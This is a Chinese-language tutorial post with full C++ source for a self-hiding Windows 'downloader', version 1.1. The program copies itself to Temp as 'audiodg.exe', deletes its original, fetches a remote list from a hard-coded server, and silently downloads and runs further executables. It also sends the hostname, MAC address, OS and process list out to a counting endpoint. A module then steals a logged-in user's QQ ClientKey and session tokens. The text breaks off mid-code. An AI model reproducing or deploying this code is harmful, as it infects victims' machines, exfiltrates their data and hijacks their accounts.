接着上一篇文章 :
打造一款智能下载者 Downloader(基础篇)
本次我们主要继续完善下载者的功能,将添加劫持QQ Key(QQ Clientkey)模块。
鉴于之前已经开篇研究过截取QQ Key(QQ Clientkey)的流程,那么直接将代码复制粘贴即可。
原文:
最新利用腾讯快捷登录协议截取QQ ClientKey实战课程【详细教学-源码共享】
相关链接:
第三课:打造一款智能下载者 Downloader(统计系统安装篇)
Downloader v1.1 版 代码 —— 2023.09.23
// downloader.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include "downloader.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
#pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" )
typedef BOOL(_stdcall *XXXCY)(LPCTSTR, LPCTSTR, BOOL);
typedef HINSTANCE(_stdcall *XXXCute)(HWND, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR, int);
typedef HRESULT(_stdcall *XXXDL)(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK);
typedef HINTERNET(_stdcall *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
typedef HINTERNET(_stdcall *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
BOOL DelSlef();
BOOL DelTempFiles();
BOOL GetProcessName(LPCTSTR szProcess);
CString GetAllProcessNames();
BOOL SendDataToCount();
BOOL PostDataToCount(TCHAR *szPostURL, TCHAR *szState1, TCHAR *szState2, TCHAR *szState3);
void GetWinOS();
BOOL IsWow64OSEx();
CString GetMacAddress(void);
TCHAR szLBFile[MAX_PATH] = "https://www.chwm.vip/load.swf"; // 远程列表文件地址
TCHAR szCountUrl[MAX_PATH] = "https://www.chwm.vip/Count.php"; // 程序统计接口地址
TCHAR szVersion[MAX_PATH] = "1.1"; // 程序版本号
TCHAR szUserID[MAX_PATH] = "admin"; // 客户编号
TCHAR szLBSaveFile[MAX_PATH] = { 0 }; // 列表文件本地保存地址
TCHAR szEXESaveFile[MAX_PATH] = { 0 }; // 下载的程序保存路径
TCHAR szSelfFilePath[MAX_PATH] = { 0 }; // 程序自身路径
TCHAR szSelfSaveFile[MAX_PATH] = { 0 }; // 程序自身释放路径
TCHAR osx[MAX_PATH] = { 0 }; // 系统版本存放变量
TCHAR CGLB[10240] = { 0 }; // 分配 10M 内存来保存成功下载的地址
BOOL TJ = FALSE;
BOOL ReStart = FALSE;
// 唯一的应用程序对象
CWinApp theApp;
using namespace std;
int main(int argc, char *argv[])
{
CString Encryption_Point = "****** 2023.09.23 ******";
for (int i = 0; i < argc; i++)
{
if (strstr(argv[i], "ReStart"))
{
ReStart = TRUE;
}
}
///
// 获取程序自身路径
GetModuleFileName(NULL, szSelfFilePath, MAX_PATH);
///
// 获取系统相关配置目录路径
// CSIDL_LOCAL_APPDATA
// FOLDERID_LocalAppData
// 版本 5.0。 用作本地(非roaming) 应用程序的数据存储库的文件系统目录。
// 典型路径为 C:\Documents and Settings\username\Local Settings\Application Data
SHGetSpecialFolderPath(NULL, szLBSaveFile, CSIDL_LOCAL_APPDATA, TRUE);
SHGetSpecialFolderPath(NULL, szEXESaveFile, CSIDL_LOCAL_APPDATA, TRUE);
SHGetSpecialFolderPath(NULL, szSelfSaveFile, CSIDL_LOCAL_APPDATA, TRUE);
lstrcat(szLBSaveFile, "\\Temp\\Load.tmp");
lstrcat(szEXESaveFile, "\\Temp");
lstrcat(szSelfSaveFile, "\\Temp\\audiodg.exe");
if ( !ReStart )
{
///
// 获取目标文件或文件夹属性
DWORD dwFileAttr = GetFileAttributes(szSelfSaveFile);
// 判断属性是否为空
if (dwFileAttr == INVALID_FILE_ATTRIBUTES)
{
//复制自身
XXXCY cy;
HMODULE hkernel;
hkernel = LoadLibrary(_T("kernel32.dll"));
cy = (XXXCY)GetProcAddress(hkernel, "CopyFileA");
if (cy != NULL)
{
cy(szSelfFilePath, szSelfSaveFile, FALSE);
}
cy = NULL;
FreeLibrary(hkernel);
Sleep(500);
lstrcat(szSelfSaveFile, " ReStart");
WinExec(szSelfSaveFile, SW_SHOW);
DelSlef();
exit(0);
}
else
{
CString szSelfRandomName = NULL;
CString szRand1 = NULL, szRand2 = NULL;
// 生成16位随机名称
time_t seed = time(NULL);
srand((unsigned)seed);
for (int j = 0; j < 16; j++)
{
switch ((rand() % 2))
{
case 1:
szRand1.Format("%C", rand() % 10 + 48);
break;
default:
szRand1.Format("%C", rand() % 6 + 65);
}
szRand2 += szRand1;
Sleep(100);
}
szSelfRandomName.Format(TEXT("\\%s.EXE"), szRand2);
TCHAR *szSelfRandomNames = szSelfRandomName.GetBuffer(szSelfRandomName.GetLength() + 1);
szSelfRandomName.ReleaseBuffer();
lstrcpy(szSelfSaveFile, szEXESaveFile);
lstrcat(szSelfSaveFile, szSelfRandomNames);
//复制自身
XXXCY cy;
HMODULE hkernel;
hkernel = LoadLibrary(_T("kernel32.dll"));
cy = (XXXCY)GetProcAddress(hkernel, "CopyFileA");
if (cy != NULL)
{
cy(szSelfFilePath, szSelfSaveFile, FALSE);
}
cy = NULL;
FreeLibrary(hkernel);
Sleep(500);
lstrcat(szSelfSaveFile, " ReStart");
WinExec(szSelfSaveFile, SW_SHOW);
DelSlef();
exit(0);
}
}
///
// 创建互斥 防止多次运行 //
///
SetLastError(0);
HANDLE g_hMutex = ::CreateMutex(NULL, FALSE, szUserID);
if (GetLastError() == ERROR_ALREADY_EXISTS)
{
exit(0);
}
///
// 开始循环工作
do{
// 清理缓存
DelTempFiles();
XXXDL kkkkkkk;
HMODULE hurlmon;
hurlmon = LoadLibrary(_T("urlmon.dll"));
kkkkkkk = (XXXDL)GetProcAddress(hurlmon, "URLDownloadToFileA");
if (kkkkkkk != NULL)
{
HRESULT hRes = kkkkkkk(NULL, szLBFile, szLBSaveFile, 0, NULL);
}
kkkkkkk = NULL;
FreeLibrary(hurlmon);
Sleep(500);
CString myText = NULL;
TCHAR Buffer[MAX_PATH] = { 0 };
FILE *TK = fopen(szLBSaveFile, "r+");
while (fgets(Buffer, sizeof(Buffer), TK) != NULL)
{
myText.Format("%s", Buffer);
//AfxMessageBox(myText);
CString szProcess = NULL, szURL = NULL;
// 标记出找到的第一个逗号在myText中的以0为初始索引的序号。
// 找不到返回-1值
int pos = myText.Find("|");
if (pos >= 0)
{
// 目标进程
// 把左边的第一段放到szProcess中
szProcess.Format("%s", myText.Left(pos));
//AfxMessageBox(szProcess);
// 下载地址
// 把除第一段剩下的放到szURL中
szURL.Format("%s", myText.Mid(pos + 1));
//AfxMessageBox(szURL);
TCHAR *TargetURL = szURL.GetBuffer(szURL.GetLength() + 1);
szURL.ReleaseBuffer();
// 判断成功列表里是否存在该下载地址
if ( !strstr(CGLB, TargetURL) )
{
// 判断系统是否存在指定进程
if ( GetProcessName(szProcess) )
{
CString myEXESaveFile = NULL;
CString szRand1 = NULL, szRand2 = NULL;
// 生成16位随机名称
time_t seed = time(NULL);
srand((unsigned)seed);
for (int j = 0; j < 16; j++)
{
switch ((rand() % 2))
{
case 1:
szRand1.Format("%C", rand() % 10 + 48);
break;
default:
szRand1.Format("%C", rand() % 6 + 65);
}
szRand2 += szRand1;
Sleep(100);
}
myEXESaveFile.Format(TEXT("%s\\%s.EXE"), szEXESaveFile, szRand2);
//AfxMessageBox(myEXESaveFile);
hurlmon = LoadLibrary(_T("urlmon.dll"));
kkkkkkk = (XXXDL)GetProcAddress(hurlmon, "URLDownloadToFileA");
if (kkkkkkk != NULL)
{
HRESULT hRes = kkkkkkk(NULL, szURL, myEXESaveFile, 0, NULL);
if (hRes == S_OK)
{
HMODULE hshell;
hshell = LoadLibrary(_T("shell32.dll"));
XXXCute cute;
cute = (XXXCute)GetProcAddress(hshell, "ShellExecuteA");
if (cute != NULL)
{
HINSTANCE hNewExe = cute(NULL, "open", myEXESaveFile, NULL, NULL, SW_SHOW);
if ((DWORD)hNewExe > 32)
{
// 成功下载并运行后
// 保存地址在成功列表
// 防止程序重复下载
lstrcat(CGLB, TargetURL);
}
}
cute = NULL;
FreeLibrary(hshell);
}
}
kkkkkkk = NULL;
FreeLibrary(hurlmon);
}
}
}
}
fclose(TK);
DeleteFile(szLBSaveFile);
if ( !TJ )
{
// 统计数据
if ( SendDataToCount() )
{
TJ = TRUE;
}
// 刷新系统缓存
SHChangeNotify(SHCNE_ASSOCCHANGED, SHCNF_FLUSHNOWAIT, NULL, NULL);
}
// 延时一分钟
Sleep(60000);
} while (1);
return 0;
}
BOOL DelSlef()
{
SHELLEXECUTEINFO sei;
TCHAR szModule[MAX_PATH], szComspec[MAX_PATH], szParams[MAX_PATH];
// Get its own file name Get the full path file name of CMD
if ((GetModuleFileName(0, szModule, MAX_PATH) != 0) &&
(GetShortPathName(szModule, szModule, MAX_PATH) != 0) &&
(GetEnvironmentVariable("COMSPEC", szComspec, MAX_PATH) != 0)) {
lstrcpy(szParams, "/c del ");
lstrcat(szParams, "\"");
lstrcat(szParams, szModule);
lstrcat(szParams, "\"");
lstrcat(szParams, " > nul");
sei.cbSize = sizeof(sei);
sei.hwnd = 0;
sei.lpVerb = "Open";
sei.lpFile = szComspec;
sei.lpParameters = szParams;
sei.lpDirectory = 0; sei.nShow = SW_HIDE;
sei.fMask = SEE_MASK_NOCLOSEPROCESS;
if (ShellExecuteEx(&sei)) {
// Set the execution level of CMD process to idle execution
SetPriorityClass(sei.hProcess, NORMAL_PRIORITY_CLASS);
// Set the priority of its own process high
SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
// Notify the windows resource
SHChangeNotify(SHCNE_DELETE, SHCNF_PATH, szModule, 0);
return TRUE;
}
}
return FALSE;
}
BOOL DelTempFiles()
{
ShellExecute(NULL, "open", "ipconfig.exe", " /flushdns", NULL, SW_HIDE);
BOOL bResult = FALSE;
BOOL bDone = FALSE;
LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;
DWORD dwTrySize, dwEntrySize = 4096; // start buffer size
HANDLE hCacheDir = NULL;
DWORD dwError = ERROR_INSUFFICIENT_BUFFER;
do
{
switch (dwError)
{
// need a bigger buffer
case ERROR_INSUFFICIENT_BUFFER:
delete[] lpCacheEntry;
lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];
lpCacheEntry->dwStructSize = dwEntrySize;
dwTrySize = dwEntrySize;
BOOL bSuccess;
if (hCacheDir == NULL)
bSuccess = (hCacheDir
= FindFirstUrlCacheEntry(NULL, lpCacheEntry,
&dwTrySize)) != NULL;
else
bSuccess = FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize);
if (bSuccess)
dwError = ERROR_SUCCESS;
else
{
dwError = GetLastError();
dwEntrySize = dwTrySize; // use new size returned
}
break;
// we are done
case ERROR_NO_MORE_ITEMS:
bDone = TRUE;
bResult = TRUE;
break;
// we have got an entry
case ERROR_SUCCESS:
// don't delete cookie entry
if (!(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY))
DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
// get ready for next entry
dwTrySize = dwEntrySize;
if (FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize))
dwError = ERROR_SUCCESS;
else
{
dwError = GetLastError();
dwEntrySize = dwTrySize; // use new size returned
}
break;
// unknown error
default:
bDone = TRUE;
break;
}
if (bDone)
{
delete[]lpCacheEntry;
if (hCacheDir)
FindCloseUrlCache(hCacheDir);
}
} while (!bDone);
return TRUE;
}
BOOL GetProcessName(LPCTSTR szProcess)
{
HANDLE hShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe32x = { sizeof(PROCESSENTRY32),0 };
if (Process32First(hShot, &pe32x))
{
CString TargetName = NULL;
TargetName.Format(TEXT("%s"), szProcess);
TargetName.MakeLower();
do {
CString ProcessName = NULL;
ProcessName.Format("%s", pe32x.szExeFile);
ProcessName.MakeLower();
if (ProcessName == TargetName)
{
CloseHandle(hShot);
return TRUE;
}
} while (Process32Next(hShot, &pe32x));
}
CloseHandle(hShot);
return FALSE;
}
CString GetAllProcessNames()
{
CString AllProcessNames = "";
HANDLE hShot2 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32),0 };
if (Process32First(hShot2, &pe32))
{
do {
CString GetProcessName = "";
GetProcessName.Format(TEXT("%s"), pe32.szExeFile);
AllProcessNames += GetProcessName;
AllProcessNames += "|";
} while (Process32Next(hShot2, &pe32));
}
CloseHandle(hShot2);
return AllProcessNames;
}
BOOL SendDataToCount()
{
TCHAR dat[10240] = { 0 };
TCHAR jsj[MAX_PATH] = { 0 };
WSADATA _wsaData = { 0 };
ZeroMemory(dat, 10240 * sizeof(TCHAR));
ZeroMemory(jsj, MAX_PATH * sizeof(TCHAR));
int _Result = 0;
_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);
if (_Result == SOCKET_ERROR)
{
lstrcat(jsj, "unkonw1");
}
_Result = gethostname(jsj, sizeof(jsj));
if (_Result == SOCKET_ERROR)
{
lstrcat(jsj, "unkonw2");
}
WSACleanup();
GetWinOS();
CString szMac = NULL;
szMac = GetMacAddress();
TCHAR *MAC = szMac.GetBuffer(szMac.GetLength() + 1);
szMac.ReleaseBuffer();
CString szProcess = NULL;
szProcess = GetAllProcessNames();
TCHAR *PROCESS = szProcess.GetBuffer(szProcess.GetLength() + 1);
szProcess.ReleaseBuffer();
// 构建统计数据
lstrcpy(dat, szCountUrl);
lstrcat(dat, "?jc=");
lstrcat(dat, PROCESS);
lstrcat(dat, "&ver=");
lstrcat(dat, szVersion);
lstrcat(dat, "&ID=");
lstrcat(dat, szUserID);
lstrcat(dat, "&MN=");
lstrcat(dat, jsj);
lstrcat(dat, "&os=");
lstrcat(dat, osx);
lstrcat(dat, "&mac=");
lstrcat(dat, MAC);
HMODULE hshell;
hshell = LoadLibrary(_T("wininet.dll"));
HINSTANCE(WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
HINSTANCE(WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
HINSTANCE(WINAPI *XXXInternetCloseHandle)(HINTERNET);
(FARPROC&)XXXInternetOpen = GetProcAddress(hshell, "InternetOpenA");
(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell, "InternetOpenUrlA");
(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell, "InternetCloseHandle");
HINTERNET hropen = XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);
if (hropen != NULL)
{
HINTERNET hropenurl = XXXInternetOpenUrl(hropen, dat, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);
if (hropenurl != NULL)
{
TCHAR buffer[MAX_PATH] = { 0 };
ZeroMemory(buffer, MAX_PATH * sizeof(TCHAR));
DWORD dwBytesRead = 0;
BOOL ret = ::InternetReadFile(hropenurl, buffer, sizeof(buffer), &dwBytesRead);
if (ret)
{
XXXInternetCloseHandle(hropenurl);
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
char *myMSG1;
myMSG1 = strstr(buffer, "Fail");
char *myMSG2;
myMSG2 = strstr(buffer, "Success");
char *myMSG3;
myMSG3 = strstr(buffer, "Repeat");
if (myMSG1 || myMSG2 || myMSG3)
{
return TRUE;
}
else
{
// 由于提取的数据过长会导致统计失败
// 这里省去 szProcess 重新统计
TCHAR postData[1024] = { 0 };
ZeroMemory(postData, 1024 * sizeof(TCHAR));
lstrcpy(postData, szCountUrl);
lstrcat(postData, "?ver=");
lstrcat(postData, szVersion);
lstrcat(postData, "&ID=");
lstrcat(postData, szUserID);
lstrcat(postData, "&CP=");
lstrcat(postData, jsj);
lstrcat(postData, "&os=");
lstrcat(postData, osx);
lstrcat(postData, "&mac=");
lstrcat(postData, MAC);
if ( PostDataToCount(postData, "Success", "Fail", "Repeat") )
{
return TRUE;
}
else
{
return FALSE;
}
}
}
}
XXXInternetCloseHandle(hropenurl);
}
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return FALSE;
}
BOOL PostDataToCount(TCHAR *szPostURL, TCHAR *szState1, TCHAR *szState2, TCHAR *szState3)
{
HMODULE hshell;
hshell = LoadLibrary(_T("wininet.dll"));
HINSTANCE(WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
HINSTANCE(WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
HINSTANCE(WINAPI *XXXInternetCloseHandle)(HINTERNET);
(FARPROC&)XXXInternetOpen = GetProcAddress(hshell, "InternetOpenA");
(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell, "InternetOpenUrlA");
(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell, "InternetCloseHandle");
HINTERNET hropen = XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);
if (hropen != NULL)
{
HINTERNET hropenurl = XXXInternetOpenUrl(hropen, szPostURL, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);
if (hropenurl != NULL)
{
TCHAR buffer[MAX_PATH] = { 0 };
ZeroMemory(buffer, MAX_PATH * sizeof(TCHAR));
DWORD dwBytesRead = 0;
BOOL ret = ::InternetReadFile(hropenurl, buffer, sizeof(buffer), &dwBytesRead);
if (ret)
{
TCHAR *myMSG1;
myMSG1 = strstr(buffer, szState1);
TCHAR *myMSG2;
myMSG2 = strstr(buffer, szState2);
TCHAR *myMSG3;
myMSG3 = strstr(buffer, szState3);
if (myMSG1 || myMSG2 || myMSG3)
{
XXXInternetCloseHandle(hropenurl);
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return TRUE;
}
}
}
XXXInternetCloseHandle(hropenurl);
}
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return FALSE;
}
void GetWinOS()
{
HKEY hKEY;
LPCTSTR data_Set = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion";
long ret0 = (RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_WOW64_64KEY | KEY_READ, &hKEY));
if (ret0 == ERROR_SUCCESS)
{
LPBYTE owner_Get1 = new BYTE[80];
DWORD type_1 = REG_SZ;
DWORD cbData_1 = 80;
ZeroMemory(osx, MAX_PATH * sizeof(TCHAR));
long ret1 = ::RegQueryValueEx(hKEY, "ProductName", NULL, &type_1, owner_Get1, &cbData_1);
if (ret1 == ERROR_SUCCESS)
{
char *OSVersion = (char *)owner_Get1;
lstrcpy(osx, OSVersion);
}
else
{
lstrcpy(osx, "Unknow System");
}
}
RegCloseKey(hKEY);
// 判断是否 64 位系统
if (IsWow64OSEx())
{
lstrcat(osx, " x64");
}
else
{
lstrcat(osx, " x86");
}
}
BOOL IsWow64OSEx()
{
typedef BOOL(WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
LPFN_ISWOW64PROCESS fnIsWow64Process;
BOOL bIsWow64 = FALSE;
fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress(GetModuleHandle("kernel32"), "IsWow64Process");
if (NULL != fnIsWow64Process)
{
fnIsWow64Process(GetCurrentProcess(), &bIsWow64);
}
return bIsWow64;
}
typedef struct _ASTAT_
{
ADAPTER_STATUS adapt;
NAME_BUFFER NameBuff[30];
}ASTAT, *PASTAT;
UCHAR GetAddressByIndex(int lana_num, ASTAT & Adapter)
{
UCHAR uRetCode;
NCB ncb;
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBRESET;
ncb.ncb_lana_num = lana_num;
uRetCode = Netbios(&ncb);
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBASTAT;
ncb.ncb_lana_num = lana_num;
lstrcpy((char *)ncb.ncb_callname, "* ");
ncb.ncb_buffer = (unsigned char *)&Adapter;
ncb.ncb_length = sizeof(Adapter);
uRetCode = Netbios(&ncb);
return uRetCode;
}
CString GetMacAddress(void)
{
CString strMacAddress;
NCB ncb;
UCHAR uRetCode;
int num = 0;
LANA_ENUM lana_enum;
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBENUM;
ncb.ncb_buffer = (unsigned char *)&lana_enum;
ncb.ncb_length = sizeof(lana_enum);
uRetCode = Netbios(&ncb);
if (uRetCode == 0)
{
num = lana_enum.length;
for (int i = 0; i < num; i++)
{
ASTAT Adapter;
if (GetAddressByIndex(lana_enum.lana[i], Adapter) == 0)
{
strMacAddress.Format(_T("%02X%02X%02X%02X%02X%02X"),
Adapter.adapt.adapter_address[0],
Adapter.adapt.adapter_address[1],
Adapter.adapt.adapter_address[2],
Adapter.adapt.adapter_address[3],
Adapter.adapt.adapter_address[4],
Adapter.adapt.adapter_address[5]);
}
}
}
return strMacAddress;
}截取QQ Key(QQ Clientkey)代码
首次会话(查找 pt_local_token 的值):
// 初始化URL
URL_COMPONENTSA crackedURL = { 0 };
char URL_STRING[] = "https://ssl.xui.ptlogin2.weiyun.com/cgi-bin/xlogin?appid=527020901&daid=372&low_login=0&qlogin_auto_login=1&s_url=https://www.weiyun.com/web/callback/common_qq_login_ok.html?login_succ&style=20&hide_title=1&target=self&link_target=blank&hide_close_icon=1&pt_no_auth=1";
char szHostName[128] = { 0 };
char szUrlPath[256] = { 0 };
crackedURL.dwStructSize = sizeof(URL_COMPONENTSA);
crackedURL.lpszHostName = szHostName;
crackedURL.dwHostNameLength = ARRAYSIZE(szHostName);
crackedURL.lpszUrlPath = szUrlPath;
crackedURL.dwUrlPathLength = ARRAYSIZE(szUrlPath);
InternetCrackUrlA(URL_STRING, (DWORD)strlen(URL_STRING), 0, &crackedURL);
// 初始化会话
HINTERNET hInternet = InternetOpenA("Microsoft Internet Explorer", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
if (hInternet != NULL){
HINTERNET hHttpSession = InternetConnectA(hInternet, crackedURL.lpszHostName, INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (hHttpSession != NULL){
HINTERNET hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", crackedURL.lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (hHttpRequest != NULL){
BOOL bRet = FALSE;
// 发送HTTP请求
bRet = HttpSendRequest(hHttpRequest, NULL, 0, NULL, 0);
if (bRet){
// 查询HTTP请求状态
DWORD dwRetCode = 0;
DWORD dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet){
// 读取整个Headers
char lpHeaderBuffer[1024] = { 0 };
dwSizeOfRq = 1024;
HttpQueryInfo(hHttpRequest, HTTP_QUERY_RAW_HEADERS, lpHeaderBuffer, &dwSizeOfRq, NULL);
// 提取 pt_local_token 的值
char* pt_local_token = lpHeaderBuffer + dwSizeOfRq;
while (pt_local_token != lpHeaderBuffer){
if (strstr(pt_local_token, "pt_local_token=")){
pt_local_token += sizeof("pt_local_token");
char* pEndBuffer = strstr(pt_local_token, ";");
*pEndBuffer = 0;
break;
}
pt_local_token--;
}
// 关闭句柄
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] pt_local_token:" << pt_local_token << "\r\n" << endl;
}
}
}
}
}二次会话(获取本机已登录的 QQ uin):
/* 二次会话 */
//生成16位随机数
time_t seed = time(NULL);
srand((unsigned)seed);
CString szRand1 = "", szRand2 = "";
for (int j = 0; j < 16; j++)
{
switch ((rand() % 2))
{
case 1:
szRand1.Format("%C", rand() % 5 + 48);
break;
default:
szRand1.Format("%C", rand() % 5 + 53);
}
szRand2 += szRand1;
Sleep(50);
}
char *szRandNum = szRand2.GetBuffer(szRand2.GetLength() + 1);
szRand2.ReleaseBuffer();
// 初始化URL参数
char lpszUrlPath[1024] = { 0 };
strcat(lpszUrlPath, "/pt_get_uins?callback=ptui_getuins_CB&r=0.");
strcat(lpszUrlPath, szRandNum); // 追加16位随机数
strcat(lpszUrlPath, "&pt_local_tk=");
strcat(lpszUrlPath, pt_local_token); // 追加pt_local_token
// 建立会话
hHttpSession = InternetConnectA(hInternet, "localhost.ptlogin2.weiyun.com", 4301, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
// 发送HTTP请求,添加头信息
char lpHeaders[] = "Referer:https://ssl.xui.ptlogin2.weiyun.com/";
bRet = HttpSendRequestA(hHttpRequest, lpHeaders, strlen(lpHeaders), NULL, 0);
if (bRet)
{
// 查询HTTP请求状态
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// 获取返回数据的大小
DWORD dwNumberOfBytesAvailable = 0;
bRet = InternetQueryDataAvailable(hHttpRequest, &dwNumberOfBytesAvailable, NULL, NULL);
if (bRet)
{
// 读取网页内容
char* lpBuffer = new char[dwNumberOfBytesAvailable + 1]();
bRet = InternetReadFile(hHttpRequest, lpBuffer, dwNumberOfBytesAvailable, &dwNumberOfBytesAvailable);
if (bRet)
{
// 提取 QQ uin
char* uin = lpBuffer + dwNumberOfBytesAvailable;
while (uin != lpBuffer)
{
if (strstr(uin, "\"uin\":"))
{
uin += sizeof("\"uin\":") - 1;
char* pEndBuffer = strstr(uin, "}");
*pEndBuffer = 0;
break;
}
uin--;
}
// 关闭句柄
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] uin:" << uin << "\r\n" << endl;
delete[] lpBuffer;
}
}
}
}
}三次会话(截取 QQ ClientKey):
/* 三次会话 */
// 构造 URL
ZeroMemory(lpszUrlPath, 1024);
strcat(lpszUrlPath, "/pt_get_st?clientuin=");
strcat(lpszUrlPath, uin);
strcat(lpszUrlPath, "&pt_local_tk=");
strcat(lpszUrlPath, pt_local_token);
// 发送HTTPS请求
hHttpSession = InternetConnectA(hInternet, "localhost.ptlogin2.weiyun.com", 4301, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
// 添加头信息
char lpHeaders2[] = "Referer:https://ssl.xui.ptlogin2.weiyun.com/";
bRet = HttpSendRequestA(hHttpRequest, lpHeaders2, strlen(lpHeaders2), NULL, 0);
if (bRet)
{
// 查询HTTP请求状态
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// 读取整个Headers
ZeroMemory(lpHeaderBuffer, 1024);
dwSizeOfRq = 1024;
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS, lpHeaderBuffer, &dwSizeOfRq, NULL);
if (bRet)
{
// 提取 ClientKey 的值
char* clientkey = lpHeaderBuffer + dwSizeOfRq;
while (clientkey != lpHeaderBuffer)
{
if (strstr(clientkey, "clientkey="))
{
clientkey += sizeof("clientkey");
char* pEndBuffer = strstr(clientkey, ";");
*pEndBuffer = 0;
break;
}
clientkey--;
}
// 关闭句柄
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] clientkey:" << clientkey << "\r\n" << endl;
}
}
}
}
}四次会话(获取 Skey 并提取 ptsigx 的值):
/* 四次会话 */
// 构造 URL
ZeroMemory(lpszUrlPath, 1024);
strcat(lpszUrlPath, "/jump?clientuin=");
strcat(lpszUrlPath, uin);
strcat(lpszUrlPath, "&clientkey=");
strcat(lpszUrlPath, clientkey);
strcat(lpszUrlPath, "&keyindex=9&u1=https://www.weiyun.com/web/callback/common_qq_login_ok.html?login_succ&pt_local_tk=&pt_3rd_aid=0&ptopt=1&style=40");
// 发送HTTPS请求
hHttpSession = InternetConnectA(hInternet, "ptlogin2.qq.com", INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
// 添加Referer
char lpReferer[128] = { 0 };
strcpy(lpReferer, "Referer: ");
strcat(lpReferer, "https://ptlogin2.qq.com/");
strcat(lpReferer, "\r\n");
HttpAddRequestHeaders(hHttpRequest, lpReferer, -1L, HTTP_ADDREQ_FLAG_ADD);
bRet = HttpSendRequestA(hHttpRequest, NULL, NULL, NULL, 0);
if (bRet)
{
// 查询HTTP请求状态
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// 获取返回数据的大小
DWORD dwNumberOfBytesAvailablex = 0;
